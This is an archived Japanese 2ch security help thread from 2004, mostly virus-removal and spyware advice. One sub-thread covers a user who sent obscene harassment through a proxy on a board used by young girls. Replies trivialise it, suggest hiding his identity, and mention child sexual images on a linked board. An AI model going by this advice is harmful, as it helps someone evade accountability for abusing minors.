その後に、日本語の言語を選択する。


731 :名無しさん@お腹いっぱい。:04/06/24 17:33
すいません、初心者ですが相談に乗ってください。
確認君でほとんど生IPと診断されるような串を
使って書き込みをしたところトラブルになってしまい
プロバイダーに訴えると言われてしまいました。
この場合どうなるのでしょうか?
串のログは残っているものなんでしょうか?


732 :名無しさん@お腹いっぱい。:04/06/24 17:35
>>731
2chへの書き込み?

733 :730:04/06/24 17:35
>>729
JV16と間違った。忘れてくれ。

734 :730:04/06/24 17:38
>>731
漏れ串使っているのにログなんていらめえ。
プロバイダーのログがあれば、十分だ。

735 :名無しさん@お腹いっぱい。:04/06/24 17:43
>>734
名前の消し忘れ

736 :名無しさん@お腹いっぱい。:04/06/24 17:54
書き込みが不安定なんですが?

737 :名無しさん@お腹いっぱい。:04/06/24 17:57
すみません、助けてください。
今、シマンテックのサイトでウィルスチェックしたら
Abone
のプログラムファイルが
VBS.Network.E
ってのに感染してるって言われました
AVGで再度調べましたがこれでは反応しないのです。
シマンテックの誤反応でしょうか・・・・

ただ、書き込みがものすごく不安定になってるのは事実なんです。。。。
どうしたらいいでしょうか?

738 :名無しさん@お腹いっぱい。:04/06/24 18:01
トレンドマイクロでも調べたら?
あとスパイウェアチェックも

739 :名無しさん@お腹いっぱい。:04/06/24 18:07
>>732
>>734

小さいですが会社がやってるコミュニティー掲示板みたいな
ところで、そこから相当の対処をしますと書かれたメールが来ました。
そこには自分のIPとプロバイダが書かれていたんですが
それは串の情報で自分のプロバイダじゃありませんでした。
この場合どうなるのでしょうか?

喧嘩してたら止めにきた係りの人に
悪態をついてしまいました。
ただそれだけなんですよ。係りの人が女性で
言ったこともちょっとひどかったんですが
まさかここまで大事にされるとは思ってませんでした


740 :名無しさん@お腹いっぱい。:04/06/24 18:09
こんなこと書いて会社の人見てたらやばいですね。

741 :名無しさん@お腹いっぱい。:04/06/24 18:14
>>739
犯罪性の高いことを書いてしまったならマズイけど、
それぐらいなら大丈夫ではないかと。

でもなんでメールアドレスばれたの?

742 :名無しさん@お腹いっぱい。:04/06/24 18:16
>>739
メールアドレスだけを登録する掲示板なの?
自分の会社がやってる掲示板?

情報を整理して書いてくれ。

743 :名無しさん@お腹いっぱい。:04/06/24 18:21
小学生の女の子とかがよく来る様なところで
フリーメールとかで登録しないとIDもらえない
ところなんですよ。
そこで女の子と喧嘩になって係りの人にまで来るな
みたいこといわれたから
わいせつなこと言ったらこれは問題ですねって
ことになったんです。
正直に告白すると恥ずかしいです。すいません

744 :682:04/06/24 18:22
>>727
その方法で試したところ動きました。全検索かけた結果が出たのでアドバイスください、お願いします。

ウイルス名
TROJ_SMALL.FO 
BKDR_HACDEF.E はウイルス隔離とでました。

あと処理できなかったのがありまして、
ウイルス名
BKDR_HACDEF.E で
感染したファイルが
C;\;RESTORE\TEMP\A0309137.CPY  から
C;\;RESTORE\TEMP\A0309142.CPY  までの6つと

---ってウイルス一つが処理できませんとでました。
処理できなかったウイルスの対処方を教えてください。
正直ビビリまくってます・・・今も早く回線切りたいぐらいです。
ここまでアドバイスくださった皆さん大変感謝しております、ありがとうございます。
またここに来るのは夜の方になってしまいますが、よろしくお願いします。

745 :名無しさん@お腹いっぱい。:04/06/24 18:25
>>743
あなたの年齢にもよりますね。
あなたが小学生ぐらいなら、許されるのでは?

わいせつな内容というのは、内容によってはマズイかも。

746 :名無しさん@お腹いっぱい。:04/06/24 18:28
>>727
internet--->internat だな

747 :名無しさん@お腹いっぱい。:04/06/24 18:31
>>744

MEとXPは、_restoreフォルダがあって、その中にあるものは
システムを修復しないにしないと削除できないんだ。

解決方法: 「_restore」フォルダ内のウイルスが処理できない原因につきましては、下記ソリューションをご参照ください。
Windows Me/XP の「_restore」フォルダから何度もウイルスを発見してしまう

Windows Me の復元ポイントの破棄は、以下の手順で行うことが可能です。
[コントロールパネル]-[システム]-「パフォーマンス」タブから「ファイルシステム」を選択します。

「ファイルシステムのプロパティ」画面から「トラブルシューティング」タブを選択し、「システムを復元しない」のチェックボックスにチェックします。

再起動を要求するメッセージが表示されますので、「はい」を選択し、コンピュータを再起動します。

上記の設定を行うとシステムの復元機能が無効となります。
システムの復元機能を再度使用する場合は、同様の手順でチェックボックスのチェックを外しておきます。
復元ポイントを再作成する場合
[スタート]-[プログラム]-[アクセサリ]-[システムツール]-[システムの復元]を選択します。

「システムの復元へようこそ」と表示されたウイザード形式の画面が表示されます。

ウイザード上の「復元ポイントを作成します」を選択し、画面の指示に従って復元ポイントの作成を行います。
なお、システムの復元機能、および復元ポイントについての詳細は、Windows のヘルプをご参照ください。


   




748 :名無しさん@お腹いっぱい。:04/06/24 18:32
Win2kをクリーンインスコした後、
ネットにつないでSPをダウンする間に
ワームにやられる確率てどのくらいなのでしょうか?

知人がSPしたし、大丈夫だと言い張っていて、
ちょっとガクブルさせたいので何かいいデータのサイトないでしょうか?

とりあえず、ネットでできるウィルスチェックを
させてみようとは思いますが。。

749 :名無しさん@お腹いっぱい。:04/06/24 18:34
>>748
ルーター付のモデムなら大丈夫なんじゃない?

750 :名無しさん@お腹いっぱい。:04/06/24 18:35
>>744
その_restoreってフォルダは、システムの復元のバックアップフォルダなんだよね。
だから、しばらくは一通り動作確認して、異常がないのを確認してから削除する。

システムの復元をいったん無効にしてから有効にすると、フォルダがリセットされる。
復元ポイントは全部削除されるから、これ以降、記憶していた復元ポイントには戻せなくなるよ。

751 :名無しさん@お腹いっぱい。:04/06/24 18:38
>>748
100%

752 :名無しさん@お腹いっぱい。:04/06/24 18:42
>>748
そんなデータ取れないって事ぐらいわかるだろが。

753 :748:04/06/24 18:42
ルーターつけて無いです。
pingが余裕で通るんですよ。

754 :名無しさん@お腹いっぱい。:04/06/24 18:43
>>753
あほか。pingは関係無いだろが。

755 :名無しさん@お腹いっぱい。:04/06/24 18:43
>>745
もちろん大人です。すいません。
ちょっとエキサイトしてたので
ストレートにかなりしつこくやってしまいました。
逮捕もあるんでしょうか?

756 :名無しさん@お腹いっぱい。:04/06/24 18:44
>>755
だから内容しだい。

757 :名無しさん@お腹いっぱい。:04/06/24 18:47
bbtecのアドレス範囲ご存じの方どなたかおねがいしますです。

758 :名無しさん@お腹いっぱい。:04/06/24 18:54
>>757
83 19 7d - 85 3b 32

759 :名無しさん@お腹いっぱい。:04/06/24 19:02
>>756
その会社が串のプロバイダに通報してそのあと
どうなるのでしょうか?
ログから本物のIPを見つけてそこに通報
あるいは迷惑かけたから賠償金とかにまでなるでしょうか?

760 :名無しさん@お腹いっぱい。:04/06/24 19:03
>>759
部屋の片付けはしておけ。

761 :名無しさん@お腹いっぱい。:04/06/24 19:08
>>759
どこの国の串を使ったかによっても違いますね。

基本的には通信の秘密で教えないことになっているので、
通常は大丈夫ですが、刑事事件として問題になったら問題かも。

762 :名無しさん@お腹いっぱい。:04/06/24 19:09
winxp使用、ウイルスバスター等非保持
ネットやってたら、なにかまずいものを踏んだらしく、デスクトップに
「WRANING! YOU'RE IN DANGER!」
と表示されてます。初心者なので何がどうなってるのかわかりません
助けてくださいお願いします

763 :名無しさん@お腹いっぱい。:04/06/24 19:10
>>761
漏れ串だってさ

764 :名無しさん@お腹いっぱい。:04/06/24 19:12
串ったって、個人が釣りで立ち上げてるのも多い。
あと、中国や韓国あたりの半日感情強い所で、まともな所の提供してる串
じゃない場合、よっぽどの事が無い限りログなんかよこさないんじゃないかな?。

765 :名無しさん@お腹いっぱい。:04/06/24 19:13
>>762
WARNING! YOU'RE IN DANGER! ウィルス
で検索汁
スパイウェアの類っぽい模様。

766 :名無しさん@お腹いっぱい。:04/06/24 19:14
あらかじめ串さしてから行く時点で
なんかねらってるかんじがするけどな

767 :名無しさん@お腹いっぱい。:04/06/24 19:15
>>744
restore以外からウイルス検出がなければネットに繋いでバスターのユーザー登録してアップデートを実行して
もう一度検索してなにも検出しなければOK。
restore内のファイルは>747さんの方法で「システムを復元しない」で再起動すれば自動的に消える。

これも確認しよう
TROJ_SMALL.FO→TEMPフォルダにXWXLOAD.EXEがないことを確認。
BKDR_HACDEF.E→ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_HACDEF.E
ここの説明にあるレジストリがないことを確認。
もしこれらが有ったなら削除。
今回の場合は最後にバスターが隔離したファイルを削除しておしまい。
「システムを復元」を利用するならチェックをはずして再起動。

スレ違いだし無理には薦めないけど…Meは「SCANREG /RESTORE」が使えるし「システムを復元」を利用しないほうがサクサク動くので個人的には推奨。
コンピュータの主な使用目的も「ネットワークサーバー」を推奨。
「SCANREG /RESTORE」「コンピュータの主な使用目的」は追々検索してください。

768 :名無しさん@お腹いっぱい。:04/06/24 19:18
>>760>>761>>763>>764
漏れじゃないですよ
生IPって診断君で言われました。
国内の地方のプロバイダ会社の串です。

769 :名無しさん@お腹いっぱい。:04/06/24 19:20
>>766
IP掲示板に表示されるんですよ。
地域とかうそついたのばれちゃうじゃないですか

770 :名無しさん@お腹いっぱい。:04/06/24 19:22
その串は、CyberSyndromeあたりで拾ったんでしょ?
個人で串立ち上げて、あそこのProxy Extractorでチェック
するとアドレスが公開プロキシとして登録されるんだよね。

だから、特に国内串は釣りが多いので、やめとくのが吉。
つか小学生いじめちゃだめw。

771 :名無しさん@お腹いっぱい。:04/06/24 19:23
>>768
国内法が適用されると思いますので、悪質で警察が本気で
検挙しようとしたら、あなたの住所や名前は判明しますね。

でも、仮に責任を追及されても厳重注意ぐらいで済むんじゃないかな。

772 :名無しさん@お腹いっぱい。:04/06/24 19:26
>>768
いずれにしても、恥ずかしいものとかは処分しとけ。

773 :名無しさん@お腹いっぱい。:04/06/24 19:27
>>770
誤 Proxy Extractor
正 Proxy Checker


774 :名無しさん@お腹いっぱい。:04/06/24 19:36
プチ祭りが開催中のところ、たびたびすいませんが、bbtecの
ネットワーク範囲(210.〜形式)ご存じの方どなたかお願いします。
>>758さんのはよくわからないのですいません。

775 :名無しさん@お腹いっぱい。:04/06/24 19:37
>>768
串のアドレス晒してみ

776 :名無しさん@お腹いっぱい。:04/06/24 19:45
>>768
それ単なる脅しなんじゃないですか?
そんなにナイーヴになる問題でもないんじゃないかと・・。
そりゃ、犯行表明とかなら別ですけど。刑事罰にはちょっと。
まさかセクハラ?もう逝かなければいいんです。何もないような気がします。

777 :名無しさん@お腹いっぱい。:04/06/24 19:56
>>774
APNIC
[218.112.0.0 - 218.143.255.255]
218.112.0.0/12
218.128.0.0/12
※Y!BBでもサイバーエリアサーチで地域名が出る場合も有る

778 :777:04/06/24 20:01
ごめん、うそだな。もっと範囲が広いね。

779 :名無しさん@お腹いっぱい。:04/06/24 20:03
>>777さん
ありがとうございます。
これでBBSのほうなんとかなりそうです。
お手数をおかけいたしまして申し訳ありませんでした。m(_ _)m

780 :名無しさん@お腹いっぱい。:04/06/24 20:04
>>778さん

レスした矢先・・・_| ̄|          ○

781 :名無しさん@お腹いっぱい。:04/06/24 20:11
でもYBB全て拒否すると全国のYBBになっちゃうから
【APNIC】
http://www.apnic.net/search/
で、その都度範囲を検索するとかじゃだめなの?。

で、ネットマスク変換する必要があるならこれ使う。
http://www.csc.fi/english/funet/calc/laskin2.html


782 :名無しさん@お腹いっぱい。:04/06/24 20:18
>>781さん

了解しました。
のちのち検討していきます。
ご親切にどうもでしたm(_ _)m

783 :名無しさん@お腹いっぱい。:04/06/24 20:19
>>775>>776

すぐ消しますがメールのコピーです
http://imgbbs1.artemis-j.com/robekaru/img-box/img20040624200747.gif



784 :名無しさん@お腹いっぱい。:04/06/24 20:21
(・∀・)馬鹿だなぁ

785 :名無しさん@お腹いっぱい。:04/06/24 20:23
>>783
謝罪して通報もされたら合わないね。

786 :名無しさん@お腹いっぱい。:04/06/24 20:25
>>783
詳しい事が解らないからなんともいえませんが、これは槍杉ですね。
わいせつ罪は発生しないんじゃ?


787 :名無しさん@お腹いっぱい。:04/06/24 20:26
親とかに知られたら家追い出されますよ
ヒッキーなんで

788 :名無しさん@お腹いっぱい。:04/06/24 20:29
>>786
このくらいのことではプロバイダに介入することは不可能。
通報しても警察は動かないでしょう。

789 :名無しさん@お腹いっぱい。:04/06/24 20:30
>>788
これくらいって、どれくらいの事をしたのか知ってるの?

790 :名無しさん@お腹いっぱい。:04/06/24 20:31
ま、今流行りの自己責任ってやつだ。
自分で書き込んだ以上、自分でケツを拭くんだな。

791 :名無しさん@お腹いっぱい。:04/06/24 20:33
>>789
>>783で判断した限りです。

792 :名無しさん@お腹いっぱい。:04/06/24 20:34
>>783
管理人頭悪そうだな
>>783がなにやったかしらんが
わいせつ罪ってなんだ?

公然猥褻罪か?まさか強制猥褻罪?w
猥褻物頒布罪なら>>783のやったこと次第で
わからなくもないけど。
民法上の損害賠償責任は負うかもしれんけどね

おれだったらシカトかな
ISPのメールから謝罪することはしない。
まあ、それ以前にそんなことしないけど。

もし不安ならそのフリーのアドレス(まさかまともな名前で登録してないよね?)
から、「すみません、反省しております。二度としません。IDも削除していただいて結構です。」
という旨の文章を送っとけば?

793 :名無しさん@お腹いっぱい。:04/06/24 20:35
>>791
何を書いたか分からないのにですか?

794 :名無しさん@お腹いっぱい。:04/06/24 20:36
当ですか?
プロバイダは住所教えたりしませんか?

正直に言うと無視されて相手にされなかったので
2,30分個人攻撃やHなこといってたら
いきなりアク禁にされました。

795 :名無しさん@お腹いっぱい。:04/06/24 20:38
( ´_ゝ`)フーン

796 :名無しさん@お腹いっぱい。:04/06/24 20:38
>>794
>プロバイダは住所教えたりしませんか?

あなたの書き込みしだいです。

797 :名無しさん@お腹いっぱい。:04/06/24 20:40
>>768
診断君で、AかB位は出たんだろうな。
生IPって、漏れ漏れ串なんじゃないのかよ?
おめえ、今繋がっているプロバイダーのIPアドレスの表示方法くらいは、知ってるんだろうな!

798 :名無しさん@お腹いっぱい。:04/06/24 20:44
>>796
かなりやりすぎたかもしれないです。

>>797
晒してもいいですがもうつながらないですよ。

799 :名無しさん@お腹いっぱい。:04/06/24 20:50
>>798
漏れ串だったら、その掲示板でプロバイダーにIPログの確認が取れたら、
それでお終い。串の方のログなんて必要ない。

800 :名無しさん@お腹いっぱい。:04/06/24 20:57
>>798
>>792氏に同意
「精神的苦痛」に関しては当の女性が損害賠償を請求しない限り関係ない。民事だからね。
「あなたの発言等は許しがたい」というのはサイト運営者の主観。
「当××××の信用を失墜させた責任」
おかしな書き込みを放置したならサイトの信用は失墜するだろうが、対処が行われている。
この場合失墜したのは「書き込み者」の信用ではないか。いずれにしても実質的な
損害が発生しているようには見えない。
「わいせつ罪の疑い」
常習的に法に触れるわいせつな書き込みをしているならともかく、たった一度の
書き込みで重大な罪に問われるケースは少ない。脅しの要素が強いと思うが
警察が本気になったら処罰は可能。だが、そんなこともないだろう。

なんらかのかたちで謝罪しとけば相手もムキになることはないと思うけど。



801 :名無しさん@お腹いっぱい。:04/06/24 20:59
>798
プロバイダはODNか?

802 :名無しさん@お腹いっぱい。:04/06/24 21:00
当の女性が訴えると言ってるんじゃないのか?

803 :名無しさん@お腹いっぱい。:04/06/24 21:02
>>798
そういう場合ってさ、最悪でもプロバイダーから追い出されて、それでお終いでしょうよ。

804 :名無しさん@お腹いっぱい。:04/06/24 21:04
>>800
相手が悪い場合は謝罪をすると追い込まれるが。

805 :名無しさん@お腹いっぱい。:04/06/24 21:07
この管理人気に入らんな
最近、こういう裁判所きどりの管理人が多くて困る。

なんで謝罪の意思を表明させるのにISPのメールじゃないと
いけないんだ?

相手の女性が民事で訴えてるならほっといても弁護士経由で来るだろ。

806 :名無しさん@お腹いっぱい。:04/06/24 21:12
>>805
当の女性が訴える可能性がある場合、それくらいは書いとくだろ?おまえが管理者でも。

807 :名無しさん@お腹いっぱい。:04/06/24 21:22
それUPしてる掲示板に
小学生の裸が載ってるのなんでかな?

おまいあれだろあれ?

808 :名無しさん@お腹いっぱい。:04/06/24 21:24
>>801
何でわかるんですか?
たしかODNかOCNだったかな。

809 :名無しさん@お腹いっぱい。:04/06/24 21:26
あ、ODNでした。
ホストが何パターンかに変わるんですよ。
2chでも他の人のせいでアク禁になってることもあります。

810 :名無しさん@お腹いっぱい。:04/06/24 21:27
>>807
すぐ消そうと思って借りただけです、すいません。

811 :名無しさん@お腹いっぱい。:04/06/24 21:28
>>809
そりゃプロバイダのマスク規制だろ。あほ。

812 :名無しさん@お腹いっぱい。:04/06/24 21:33
>>810
まああれだ、スレアドでいいから取り敢えず謝る。
それでも粘着するようだったら無視。俺ならそうする。

813 :名無しさん@お腹いっぱい。:04/06/24 21:36
>>783
メールの内容を見ました。

>>792さんの書かれているように、そのメールが
送られてきたフリーのメアドから謝罪メールを送れば
良いでしょう。

相手は謝罪を要求しているのですから、どんな形であれ
謝罪しておけば、とりあえずはOKです。

逆にこちらの情報を相手に与える方が不利になる可能性もあります。
当面は、上記の方法で様子を見てはいかかでしょうか?


814 :名無しさん@お腹いっぱい。:04/06/24 21:36
>>811
調べてみます
>>812
メール送る時串使ったら怒らないですかね。

815 :名無しさん@お腹いっぱい。:04/06/24 21:38
             ./                                      <,
な. 元.わ つ み わ  〈           ,,._ ,_             ,_,_          ) 成 大 ガ
.っ 気 し. っ ん し   >‐     , く  ヽ ヽ          r'^i  1 `メ、      < 功 漁 ハ
た に は た な の   (´       , く  ゙ヽ  i_丿           ト、|_ |   / ヽ、      ) じ .じ .ハ
ぞ     .ぞ  レ.  .>     _∧  ヽ, ノ ̄   .             ~"ヽノ   ,ヘ     <、.ゃ ゃ ハ
         ス.  (.   / ト、^‐r'"                       ゝィー-=ヘ     く
         が   > /  .|  `〈         _,,-‐=一- 、       八ー-一ト、    冫⌒Y⌒Y⌒Y⌒
                i′〈   〉ー-/:.:i        /,,.-‐  ‐- 、ヽ    |:.:.\ _ _| ヽ,
γ⌒V⌒Y⌒Y⌒ヽへ!  1  |_/.:.:.:.i'⌒     .//,,.-一テ‐、キ    /.:.:.:.:.:^'↓  ヽ
.′               1  レ゙.:.:.:.:.:.:.:i.     / ,,イ// /;彡ヽi   ./.:.:.:.:.:.:.:.:.:\  l
                  八/.:.:.:.:.:.:.:.:.:.ヽ ⌒ヽ レ'| |/ / / |〉(・.)||   /.:.:.:.:.:.:.:.:.:.:.:.:.:.:\|
              ,.-‐ '⌒).:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:ヽ   | | |/ /_{二}コ  ||  /.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:|  , - ‐、
            r'"´     ノ.:.:.:.:.:.:.:.:.:./.:.:.r.:.:.:.:^ー | | |/ヒニニ=ニニソ ||/ヽ;:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:l`゙′  ト、
      、_     l       {.:.:.:.:.:.:.:.:.:.:.:|.:.:.:|.:|.:.:.:.:.:.:.:}ヘ{ |   ̄ ̄  /.:.:.:.:.:.|.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:|     ト、
.       }`Y⌒ }    |.:.:.:.:.:.:.:.:.:.:.:.:.:.:.|.:|.:.:.:.:.:.:./|.:.:ト ヽ===彳トぃ.:.!::::|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:./  


816 :名無しさん@お腹いっぱい。:04/06/24 21:39
>>813
相手が悪いと謝ったら追い込まれますよ。

817 :名無しさん@お腹いっぱい。:04/06/24 21:39
http://etc2.2ch.net/test/read.cgi/intro/1088043018/46
神ID、他紹介よろー


818 :名無しさん@お腹いっぱい。:04/06/24 21:40
>>814
個人情報は絶対漏らさぬが吉。

819 :名無しさん@お腹いっぱい。:04/06/24 21:41
ヒッキー、荒し、ロリコン
は罰を受けなきゃだめですなぁ


820 :名無しさん@お腹いっぱい。:04/06/24 21:42
>>816
とりあえず、謝らない方がいい。

821 :名無しさん@お腹いっぱい。:04/06/24 21:44
おまえさぁ プロバイダのメールで謝罪しろって理由は
お前の串だってばれてるからじゃいのか?
いまさらきずいた俺も遅いが

822 :名無しさん@お腹いっぱい。:04/06/24 21:49
>>816
今回の場合は相手の落ち度は小さいと思われます。
謝罪しても今以上に不利にはならないでしょう。

むしろ、こちらの情報を漏らすほうが危険かと。


823 :名無しさん@お腹いっぱい。:04/06/24 21:51
自分が悪いとは言え親に知られたらなんて言われることだか


824 :名無しさん@お腹いっぱい。:04/06/24 21:52
北海道人なのか?

825 :名無しさん@お腹いっぱい。:04/06/24 21:57
>>822
「相手が悪い」=「相手のたちが悪いと」って意味だとおもうぞ。

「相手の落ち度は小さいと思われます」ってお前、天然系だろ?

826 :名無しさん@お腹いっぱい。:04/06/24 21:57
>>824
純粋な馬鹿ってことかい?

827 :名無しさん@お腹いっぱい。:04/06/24 21:59
>>826 いやいや、あの警告分の貼ってあるBBSのログの中に...


828 :名無しさん@お腹いっぱい。:04/06/24 22:04
>>827
え?管理人さんですか?すいません。まずかったですか?

829 :名無しさん@お腹いっぱい。:04/06/24 22:07
>>825
馬鹿はあんた。
相手のたちが悪かろうが、身元を特定されない形で
謝罪しても追い込まれることは無い。
謝罪によって相手の気が多少なりとも軽減されればおけ。


830 :名無しさん@お腹いっぱい。:04/06/24 22:07
>>828
いや、ODNの契約社員です。

831 :名無しさん@お腹いっぱい。:04/06/24 22:08
>>828
そういう意味では無かったんですが...。
管理人ではないです。あのBBSに貼ったのも特に無問ないと思います。
そういう意味なら、他の炉画像貼り付けてる香具師の方がよっぽどまずいかと。

832 :名無しさん@お腹いっぱい。:04/06/24 22:10
>>828
 いやいや、ODN北海道支店のトイレ掃除のアルバイトです。

833 :名無しさん@お腹いっぱい。:04/06/24 22:10
>>829
追い込みをかける場合、
ODNに身元を確認するのは、後でも先でも関係無いと思うが。

834 :名無しさん@お腹いっぱい。:04/06/24 22:11
うわぁハズ・・・・・
自作自演とかモロバレですか?
しかもマイ掲示板なんだけど・・・・
ログにIPが。。

835 :名無しさん@お腹いっぱい。:04/06/24 22:13
やべぇ
管理人だけがIP見れると思ってた。
こいつバカとか思われてたのか。。。

836 :名無しさん@お腹いっぱい。:04/06/24 22:18
具合悪いんで酒飲んでもう寝ます

837 :名無しさん@お腹いっぱい。:04/06/24 22:19
×具合悪いんで酒飲んでもう寝ます
○都合がry

838 :名無しさん@お腹いっぱい。:04/06/24 22:21
心臓弱いんでいじめないでください



839 :名無しさん@お腹いっぱい。:04/06/24 22:24
   )\(  (ヽ ( (\γ/レ//ノlノlノ)__
    )\ (ヽ  \、,》) 《 (  ノ ノ ノ
   ノ /        ' 》  》 ミ     ゝ
  ノ (( 巛 《《   )        lll   ゝ
  ~(   ノ     (川    )  ) )  ヽ)
  ノノ     彡  ノ  ヽ )) ノノ )ノ )ノ)ν
  ノ  ノノ      》)》 νν■■■/
  <    川/⌒>  ノ   <(タ) ,(ゝ
  )(  ))  || | ⊂\ |        ヽ
  ノ(    ((  (~  ヽ|         ヽ
  ((   川 \\ ~、||        , >
  ノ      |`ー´          (~     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ノ) ノノ ((  」    |       ・/    < おまえはもう氏んでいる
  <     」     |      /)      \___________
  ((( (  (ゝ      |       <
   ((ヽ((vV       、_     ヽ
   /          :    ̄ー、_)
⌒ 彡ヾ\      ;:     :   |⌒⌒ー、
 彡ヾ\     ;:     :   |     ⌒ヽ
 彡彡ヾ\    ;:        <⌒⌒ー、_


840 :名無しさん@お腹いっぱい。:04/06/24 22:25
   )\(  (ヽ ( (\γ/レ//ノlノlノ)__
    )\ (ヽ  \、,》) 《 (  ノ ノ ノ
   ノ /        ' 》  》 ミ     ゝ
  ノ (( 巛 《《   )        lll   ゝ
  ~(   ノ     (川    )  ) )  ヽ)
  ノノ     彡  ノ  ヽ )) ノノ )ノ )ノ)ν
  ノ  ノノ      》)》 νν■■■/
  <    川/⌒>  ノ   <(タ) ,(ゝ
  )(  ))  || | ⊂\ |        ヽ
  ノ(    ((  (~  ヽ|         ヽ
  ((   川 \\ ~、||        , >
  ノ      |`ー´          (~     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ノ) ノノ ((  」    |       ・/    < おまえはもう氏んでいる
  <     」     |      /)      \___________
  ((( (  (ゝ      |       <
   ((ヽ((vV       、_     ヽ
   /          :    ̄ー、_)
⌒ 彡ヾ\      ;:     :   |⌒⌒ー、
 彡ヾ\     ;:     :   |     ⌒ヽ
 彡彡ヾ\    ;:        <⌒⌒ー、_


841 :名無しさん@お腹いっぱい。:04/06/24 22:28
http://security.ten.thebbs.jp/1079599543/e100

マルチ発見、バッジオ同時レス進行

842 :名無しさん@お腹いっぱい。:04/06/24 22:34
腹痛ぇw。
この人最高だな>バッジオ氏

843 :名無しさん@お腹いっぱい。:04/06/24 22:34
msnメッセに登録しておくと自分が許可しないのに(気付かないうちに)
自分のwebカメラの映像が見られる方法があるって聞いたんですが、本当ですか?

844 :名無しさん@お腹いっぱい。:04/06/24 23:19
バッジオ(・∀・)ニヤニヤ

845 :名無しさん@お腹いっぱい。:04/06/24 23:36
常にモデムの通信ランプが点灯し続け頻繁にノーd先生が反応しウィルス検知するので
怪しいと想ってADwareとspybotによる掃除をしても直らず
如何わしいのでmsconfigでスタートアップをみてみると
wuadsff.exeという怪しいものがスタートアップに登録されておりチェックは外しました
とりあえず通信ランプの怪しい点灯と頻繁なウィルス検知は治まりました
ノーd ADware spybotに反応せずググッても関連情報が得られずホトホト困ってます
wuadsffとは何か?御存知の方お教え下さい
又はウィルスならウィルススレ スパイならスパイスレ詳しく教えて頂ける適切なスレ
への誘導でも構いません何卒宜しく御願い致します

846 :名無しさん@お腹いっぱい。:04/06/24 23:53
http://support.microsoft.com/default.aspx?scid=%2Fdirectory%2Fworldwide%2Fja%2Fkblight%2Ft009%2F7%2F06.asp
と同じ症状で、その亜種にかかってしまったようなのですが、
書いてあるファイルが見当たりません。

同種で最近流行のもののファイル名などを
教えてください。

847 :名無しさん@お腹いっぱい。:04/06/24 23:55
少しお尋ねしたいんでつが
さっき前にDLしたhtmlファイルを起動したら
何か知らないポップアップ広告が出てきて
すぐに×ボタン押して消したんですけど
その後WMPで内部アプリケーションエラーが発生しました
って出てWMPが起動が出来なくなり
IEのスタートページも知らないページに飛んで
(さっき出た広告のページが出ました)
そんで一回再起動したらmHotkey.exeが起動してて
mHotkeyを終了して
IEを見たら真っ白の画面になるようになって
スタートページがabout:blankになってました
スパイボットでスパイウェアか調べたんですが引っ掛からず
困っています。
かなり焦ってて文章おかしいかもしれませんが
どうかよろしくおながいします(ペコリ

848 :名無しさん@お腹いっぱい。:04/06/25 00:02
>>847

それウィルスだよVBS loveletter。
ウィルスバスターかノートンで駆除できると
おもうけど。

849 :名無しさん@お腹いっぱい。:04/06/25 00:08
>>846
流行ってるか知らないけど
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?NAV=1&m=q&virus=BLASTER&alt=BLASTER
でもね…そんなの知るよりシマンッテクやトレンドのオンラインスキャンでもしたほうがイイ
http://pc5.2ch.net/test/read.cgi/sec/1087093973/10
>>847
Spybotスレのテンプレここの3番目
http://pc5.2ch.net/test/read.cgi/sec/1088078543/10

850 :名無しさん@お腹いっぱい。:04/06/25 00:09
about:blank について調べていて
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html#searchfor
ここにたどりつきましたが・・・
Decode this というボタンを押し変な文字列がでてきました。
その後何をすればいいのかわかりません。
教えてください><

851 :847:04/06/25 00:12
>>848
ありがとうございます!
今までウィルスとか感染した事無かったので
漏れは大丈夫だと思ってました
やっぱり誰でも感染する可能性はあるのですね
ノートン先生の体験版が最初からPCに入ってたので
今インストしてチェックしているのですが
既に11個も見つかりまして、結構焦ってます(苦藁

VBS loveletterってメール開いた時に感染するんですよね?
そんなことはした覚えは無いのですが亜種でhtmlから
感染するタイプもあるんでつか?

852 :847:04/06/25 00:21
>>849
更新するの忘れていたので連投でスミマセヌ
今3番目のページを見に行ったらずばりでした。
三つ目の写真の青い文字のページに飛びました
>ここでは「about:blank Search for型」と呼びます
でも今IE見てみたら白い画面で出てこないのですが・・・。

ホントこっち系の知識が少ないので
恥ずかしくそして悲しいでつ

853 :名無しさん@お腹いっぱい。:04/06/25 00:30
>>849
ありがとうございます。
両方のオンラインスキャンをかけて見たのですが、
検出はされませんでした。

ネットにつないでいない間は、
とりあえず症状がでないので、
攻撃を受けているのかなという印象もします。

ネットにつないで落ちる前にMSのパッチを高速でDLして、
パッチを当てたところ、とりあえずネットにつないでも落ちなくなりました。
ただ、起動に異様に時間がかかるので、
レジストリで起動時に読み込んでいる何かを
探してみます。

重ねてありがとうございます

854 :名無しさん@お腹いっぱい。:04/06/25 00:39
>>850
「Decode this」の枠内に現れた文字列を、パスを省略せず全部メモして
(一旦メモ帳にコピペするとわかりやすいです。)
「セーフモードでDLLファイルを除去」から先に書いてあることをすればいいのです。
以上うまく説明できません。

855 :854:04/06/25 00:41
以上うまく説明できません。→これ以上うまく説明できません。



856 :854:04/06/25 00:45
再度訂正
「Decode this」の枠内→「Decode this」下の枠内
スレ汚しスマソ

857 :682:04/06/25 00:58
>>747
大変詳しく説明していただき誠にありがとうございます。
他の方のアドバイスも参考に色々と試していきたいと思いますので結果はまだお待ち下さい。

>>750
動作確認とは具体的にはどの様なことをすればいいですか?
普通にネットしたりとかでしょうか?
・・・今自分の状態はネットに繋いだら速攻でこのスレに来まして、
必要な文を取得したら即ネット切り、オフラインでこの文章も書いております・・・それぐらいビビってます。
復元ポイントの削除とはそれほど気にしなくてもよいことでしょうか?
あとで>>747さんのアドバイス通り検索してみますが、ネットをするだけで今は怖いんで・・・

>>767
---ってウイルスも発見されましたが、これは大丈夫でしょうか?
どの部分に感染していたかは・・・あれ?手書きでメモったのですが、書いてないです・・書き忘れたみたいです。


とりあえず、今の状態で少々長い時間ネット使ったりしても問題ないですか?

